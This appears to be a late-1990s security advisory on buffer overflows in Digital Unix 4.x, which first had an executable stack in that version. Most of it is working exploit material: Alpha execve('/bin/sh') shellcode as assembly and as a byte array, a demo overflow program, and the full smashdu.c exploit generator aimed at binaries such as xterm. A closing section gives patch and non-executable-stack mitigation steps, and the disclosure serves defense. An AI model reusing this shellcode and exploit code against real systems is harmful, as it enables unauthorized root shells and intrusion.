COMMAND

    buffer overflows

SYSTEMS AFFECTED

    Digital Unix 4.x

PROBLEM

    By the  end of  january 1999,  Lamont Granquist  brought to public
    something  many  people  beleived  not  to  be  possible  - buffer
    overflow  on  DU.   While  3.x  may  keep  title of unbreakable OS
    regarding buffer overflows, changes  to 4.x changed that  as well.
    Previously  Digital  Unix  has  been  relatively  immune to buffer
    overflow attacks due to the lack of an executable stack in the 3.x
    versions.  For the 4.0  versions the stack was made  executable --
    likely for  JIT compilers  and maybe  programs that  need GCC-like
    trampolines. To see  Lamont's post, see  'at' and 'mh'  in Digital
    section.   This  text  follows  Seth  Michael McGann posting which
    discovers his work on this subject.

    Seth had been working on Dec Unix shellcode and sort of  abandoned
    the project after making a  test exploit using an executable  heap
    buffer.  Never believe anyone,  always test it yourself.   Here is
    what he had come up with,  it includes an asm of the  shellcode as
    well as  a demo  exploit.   You will  notice the  large amount  of
    zeros, in fact the PAL code  for a syscall is 0x00000083.   So, we
    are not going to easily sidestep the problem of NULL removal as we
    can on x86.  Suggestion is to use a technique used in several IMAP
    exploits, where the shellcode is encoded and then decoded.  At any
    rate, this should get you started.  And allow you to see for  your
    self what needs to be done.  Shellcode in asm:

    .globl main
    .ent main
    main:
    jmp egg         # find out where we are
    backhere:
    mov $26,$30
    mov  $26 , $16
    mov  $26, $1      # make a copy of ra
    addq $1, 0x08, $1 # offset 8
    mov  $1 , $17     # points at argv
    addq $1, 0x04, $1 # offset 8
    stq  $26, 8($30)
    stq  $31,  16($30)
    mov  0x0, $18      # move in the syscall number (execve in this case)
    addq $31,0x3b,$0   #
    .quad 0x00000083   # do the deed

    egg:
    bsr backhere
    .ascii "/bin/sh\0"
    .quad 0     # pointer to /bin/sh  (argv[0])
    .quad 0     # pointer to NULL
    .quad 0     # this is unnecessary, but i left it in for debug
    .quad 0
    .end

    Simple, eh? You'll notice all  the common techniques used in  this
    egg.   This  would  be  suitable  for  a  bcopy  overflow (iquery,
    bootpd...) just add the dup's and your set.  When you compile this
    with as you will nedd to strip off the headers and insert into the
    stack for it  to work, lest  it crash due  to modifiying the  text
    segment.   Here is  an example  loaded with  the shellcode.   Test
    program:

    char sc[]= { 0x0c, 0x00, 0xe0, 0xd3,0x01, 0x04, 0x5a, 0x47,
                 0x1e, 0x04, 0x5a, 0x47,0x01, 0x14, 0x21, 0x40,
                 0x11, 0x04, 0x21, 0x44,0x10, 0x04, 0x5a, 0x47,
                 0x08, 0x00, 0x5e, 0xB7,0x01, 0x94, 0x20, 0x40,
                 0x10, 0x00, 0xfe, 0xb7,0x00, 0x74, 0xe7, 0x43,
                 0x12, 0x04, 0xff, 0x47,0x83, 0x00, 0x00, 0x00,
                 0x1f, 0x04, 0xff, 0x47,0xF3, 0xFf, 0x5F, 0xD3,
                 '/', 'b','i','n','/','s','h',0x00,
                 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
                 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
                 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};

    main(int argc,char **argv) {
    leaf();
    }

    leaf(){
    char blow[512];
    int i;
    unsigned long addr;

    addr=(unsigned long)blow;

    for(i=0;i<1024;i+=8) {
    blow[i]=addr & 0xFF;
    blow[i+1]=(addr >> 8) & 0xFF;
    blow[i+2]=(addr >> 16) & 0xFF;
    blow[i+3]=(addr >> 24) & 0xFF;
    blow[i+4]=(addr >> 32) & 0xFF;
    blow[i+5]=(addr >> 40) & 0xFF;
    blow[i+6]=(addr >> 48) & 0xFF;
    blow[i+7]=(addr >> 56) & 0xFF;
    }
    bcopy(sc,blow,sizeof(sc));
    }

    Simply compile and run, and you  will receive a shell.  On  Alphas
    you  will  need  to  return  from  the  parent  of the overflowing
    function to get any effect.  In this case leaf() overflows and  on
    exit from main() we get our shell.  On another note, if you have a
    standard string overflow you will need to be wary of NULLs.   This
    shellcode can easily be converted  to have no zero bytes  using an
    encoding routine.  A bigger  problem is the return address,  which
    almost certainly will have nulls.   Since this is a little  endian
    architecture we can fill in the least significant bits and be done
    with it.  A  side effect is we  have to guess the  offset exactly,
    or no go.  Anyway, this has been post before its obsolete.   Maybe
    this will get something out of it while waiting for better code.

    And  speaking  of  others  people  code, here's the Lamont's work.
    The following example code should  be a pretty decent toolkit  for
    doing buffer overruns  on DU4.0x.   The buffer overflow  itself is
    pretty kludgy and is contained in the genshellcode() function  and
    in the rawcode[] buffer.  The  entry point to the shellcode is  in
    the middle of the shellcode,  *not* at the beginning, so  that you
    can do  a branch  backwards (offset  is negative  -- e.g.  0xffed,
    instead of  positive --  e.g. 0x0038)  which avoids  a zero in the
    shellcode.  Therefore genshellcode() has  to be a little bit  more
    convoluted and has to modify  the ending branch instruction.   The
    shellcode itself is a little bit nutty in order to avoid all those
    nulls.  Avoiding nulls is  a real pain.  The  call_pal instruction
    (part of exec("/bin/sh")) has a bunch of unavoidable nulls and the
    "/bin/sh"  itself  has  an  unavoidable  null  -- the xors are for
    taking care of things  like that.  It  also uses offsets of  about
    0x140 to avoid nulls in the first byte of the offset.  This  thing
    might be able to be done better and tighter.  Right now it must be
    at least 80 bytes  in length.  The  shellcode gets dumped into  an
    environment variable,  similarly to  Aleph1's code  in his  phrack
    article.  You can also specify command line arguments of the  form
    '-e "DISPLAY=foo:0.0"' (ex) if you need additional ones.  It  then
    takes the shellcodesize (size on the heap where the shellcode gets
    stuck -- 80  is the minimum  -- this is  not the buffer  that gets
    overflowed -- 1024 is probably a good value), then the padding  (a
    value from 0..7  which adjusts the  shellcode so that  it is on  a
    64-bit word boundary since env variables are not aligned at  all),
    then  the  size  of  the  buffer  overflow.   The  buffer overflow
    currently fills the buffer with 'a' (0x61) characters and then the
    ra.  The ra can be  changed with the '-r' argument --  remember to
    avoid  nulls  in  the  ra.   Then  you  simply  give  command line
    arguments as you would normally to run the program you are  trying
    to overflow where a single  %e will get substituted by  the buffer
    overflow.  Ex:

        ./smashdu -e "DISPLAY=foo:0.0" 1024 0 1501 /usr/bin/X11/xterm -fg %e

    (which nearly works -- i can't  figure it out -- 1501 is  too long
    while 1500  is too  short --  Digital Unix  4.0B, unpatched).  The
    code:

    /* smashdu.c
       generic buffer overflow C 'script' for DU4.x (4.0B, 4.0D, ???)
       Lamont Granquist
       lamontg@hitl.washington.edu
       lamontg@u.washington.edu
       Tue Dec  1 11:22:03 PST 1998

       gcc -o smashdu smashdu.c */

    #define MAXENV 30
    #define MAXARG 30

    #include <unistd.h>
    #include <stdlib.h>
    #include <strings.h>
    #include <stdio.h>

    /* shellcode = 80 bytes.  as the entry to this shellcode is at offset+72 bytes
       it cannot be simply padded with nops prior to the shellcode.  */

    int rawcode[] = {
      0x2230fec4,              /* subq $16,0x13c,$17       */
      0x47ff0412,              /* clr $18                  */
      0x42509532,              /* subq $18, 0x84           */
      0x239fffff,              /* xor $18, 0xffffffff, $18 */
      0x4b84169c,
      0x465c0812,
      0xb2510134,              /* stl $18, 0x134($17)      */
      0x265cff98,              /* lda $18, 0xff978cd0      */
      0x22528cd1,
      0x465c0812,              /* xor $18, 0xffffffff, $18 */
      0xb2510140,              /* stl $18, 0x140($17)      */
      0xb6110148,              /* stq $16,0x148($17)       */
      0xb7f10150,              /* stq $31,0x150($17)       */
      0x22310148,              /* addq $17,0x148,$17       */
      0x225f013a,              /* ldil $18,0x13a           */
      0x425ff520,              /* subq $18,0xff,$0         */
      0x47ff0412,              /* clr $18                  */
      0xffffffff,              /* call_pal 0x83            */
      0xd21fffed,              /* bsr $16,$l1    ENTRY     */
      0x6e69622f,              /* .ascii "/bin"            */
                               /* .ascii "/sh\0" is generated */
    };

    int nop           = 0x47ff041f;
    int shellcodesize = 0;
    int padding       = 0;
    int overflowsize  = 0;
    long retaddr      = 0x11fffff24;


    void usage(void) {
      fprintf(stderr, "smashdu [-e <env>] [-r <ra>] ");
      fprintf(stderr, "shellsize pad bufsize <cmdargs>\n");
      fprintf(stderr, "  -e: add a variable to the environment\n");
      fprintf(stderr, "  -r: change ra from default 0x11fffff24\n");
      fprintf(stderr, "  shellsize: size of shellcode on the heap\n");
      fprintf(stderr, "  pad: padding to alighn the shellcode correctly\n");
      fprintf(stderr, "  bufsize: size of the buffer overflow on the stack\n");
      fprintf(stderr, "  cmdargs: %%e will be replaced by buffer overflow\n");
      fprintf(stderr, "ex: smashdu -e \"DISPLAY=foo:0.0\" 1024 2 888 ");
      fprintf(stderr, "/foo/bar %%e\n");
      exit(-1);
    }

    /* this handles generation of shellcode of the appropriate size and with
       appropriate padding bytes for alignment.  the padding argument should
       typically only be 0,1,2,3 and the routine is "nice" in that if you feed
       it the size of your malloc()'d buffer it should prevent overrunning it
       by automatically adjusting the shellcode size downwards. */


    int genshellcode(char *shellcode, int size, int padding) {
      int i, s, n;
      char *rp;
      char *sp;
      char *np;

      rp = (char *)rawcode;
      sp = (char *)shellcode;
      np = (char *)&nop;
      s  = size;

      if (size < (80 + padding))  {
        fprintf(stderr, "cannot generate shellcode that small: %d bytes, ");
        fprintf(stderr, "with %d padding\n", size, padding);
        exit(-1);
      }

    /* first we pad */
      for(i=0;i<padding;i++) {
        *sp = 0x6e;
        sp++;
        s--;
      }

    /* then we copy over the first 72 bytes of the shellcode */
      for(i=0;i<72;i++) {
        *sp = rp[i];
        sp++;
        s--;
      }

      if (s % 4 != 0) {
        n = s % 4;
        s -= n;
        printf("shellcode truncated to %d bytes\n", size - n);
      }

    /* then we add the nops */
      for(i=0; s > 8; s--, i++) {
        *sp = np[i % 4];
        sp++;
      }
      n = i / 4;       /* n == number of nops */

    /* then we add the tail 2 instructions */
      for(i=0; i < 8; i++) {
        *sp = rp[i+72];
        if(i==0)   /* here we handle modifying the branch instruction */
          *sp -= n;
        *sp++;
      }

    }

    int main(argc, argv)
      int   argc;
      char *argv[];
    {
      char *badargs[MAXARG];
      char *badenv[MAXENV];
      long  i, *ip, p;
      char *cp, *ocp;
      int   c, env_idx, overflow_idx;

      env_idx = 0;

      while ((c = getopt(argc, argv, "e:r:")) != EOF) {
        switch (c) {
        case 'e':                         /* add an env variable */
          badenv[env_idx++] = optarg;
          if (env_idx >= MAXENV - 2) {
            fprintf(stderr, "too many envs, ");
            fprintf(stderr, "try increasing MAXENV and recompiling\n");
            exit(-1);
          }
          break;
        case 'r':                         /* change default ra */
          sscanf(optarg, "%x", &retaddr);
          break;
        default:
          usage();
          /* NOTREACHED */
        }
      }

      if (argc - optind < 4) {
        usage();
      }

      shellcodesize = atoi(argv[optind++]);
      padding       = atoi(argv[optind++]);
      overflowsize  = atoi(argv[optind++]);

      printf("using %d %d %d\n", shellcodesize, padding, overflowsize);

    /* copy the args over from argv[] into badargs[] */
      for(i=0;i<29;i++) {
        if (strncmp(argv[optind], "%e", 3) == 0) {  /* %e gets the shellcode */
          badargs[i] = malloc(overflowsize);
          overflow_idx = i;
          optind++;
        } else {
          badargs[i] = argv[optind++];
        }
        if (optind >= argc) {
          i++;
          break;
        }
      }

      badargs[i] = NULL;

      if (optind < argc) {
        fprintf(stderr, "too many args, try increasing MAXARG and recompiling\n");
        exit(-1);
      }

      printf("putting overflow code into argv[%d]\n", overflow_idx);

      cp = badargs[overflow_idx];
      for(i=0;i<overflowsize-8;i++) {
        *cp = 0x61;
        cp++;
      }

      ocp = (char *) &retaddr;

      for(i=0;i<8;i++) {
        cp[i] = ocp[i];
      }

    /* here is where we actually shovel the shellcode into the environment */
      badenv[env_idx] = malloc(1024);
      genshellcode(badenv[env_idx++],shellcodesize,padding);
      badenv[env_idx] = NULL;

    /* and now we call our program with the hostile args */
      execve(badargs[0], badargs, badenv);

    }

SOLUTION

    If you  are running  Digital Unix,  you gotta  problem now.   Keep
    your system up to date. However, Digital Engineering has developed
    an  non-exec-stack  patch  for  Digital  Unix  4.0D.  This must be
    applied *ONLY* to Digital Unix 4.0D with the BL11 jumbo patch  kit
    #3 installed.   It is not  known at this  time if Compaq  plans on
    incorporating this into 4.0E or into any future or prior releases.
    BL11/PK3 for DU4.0D can be obtained at:

        ftp://ftp.service.digital.com/public/dunix/v4.0d/duv40das00003-19990208.tar

    After installing this patch kit download the following two files:

        ftp://xfer.service.digital.com/to_customer/proc.mod
        ftp://xfer.service.digital.com/to_customer/std_kern.mod

    Then do something  of this nature  to move them  into /sys/BINARY,
    while preserving  the original  files (you'll  probably need  them
    for future patch kits):

        mv /sys/BINARY/proc.mod /sys/BINARY/proc.mod.orig
        mv /sys/BINARY/std_kern.mod /sys/BINARY/std_kern.mod.orig
        mv proc.mod /sys/BINARY
        mv std_kern.mod /sys/BINARY

    Rebuild  your   kernel  (cd   /sys/conf/<WHATEVER>;  doconfig -c
    <WHATEVER>), reinstall  your kernel  and reboot.   The stack  will
    now be non-executable by default.  To change this add the line:

        proc:
                executable_stack = 1

    to /etc/sysconfigtab - there is no need to reboot.  Alternatively,
    as root issue the command:

        # sysconfig -r proc executable_stack=1

    Of  course,  set  this  value  to  zero if you want non-exec-stack
    again.   Of course  this patch  may cause  certain programs  (like
    compilers) to break, keep this in mind, it may not be  appropriate
    for workstations that have a lot of development work on them.   It
    will  probably  be  a  good  thing  for servers and general-access
    machines though.  And remember, *ONLY* for DU4.0D with BL11.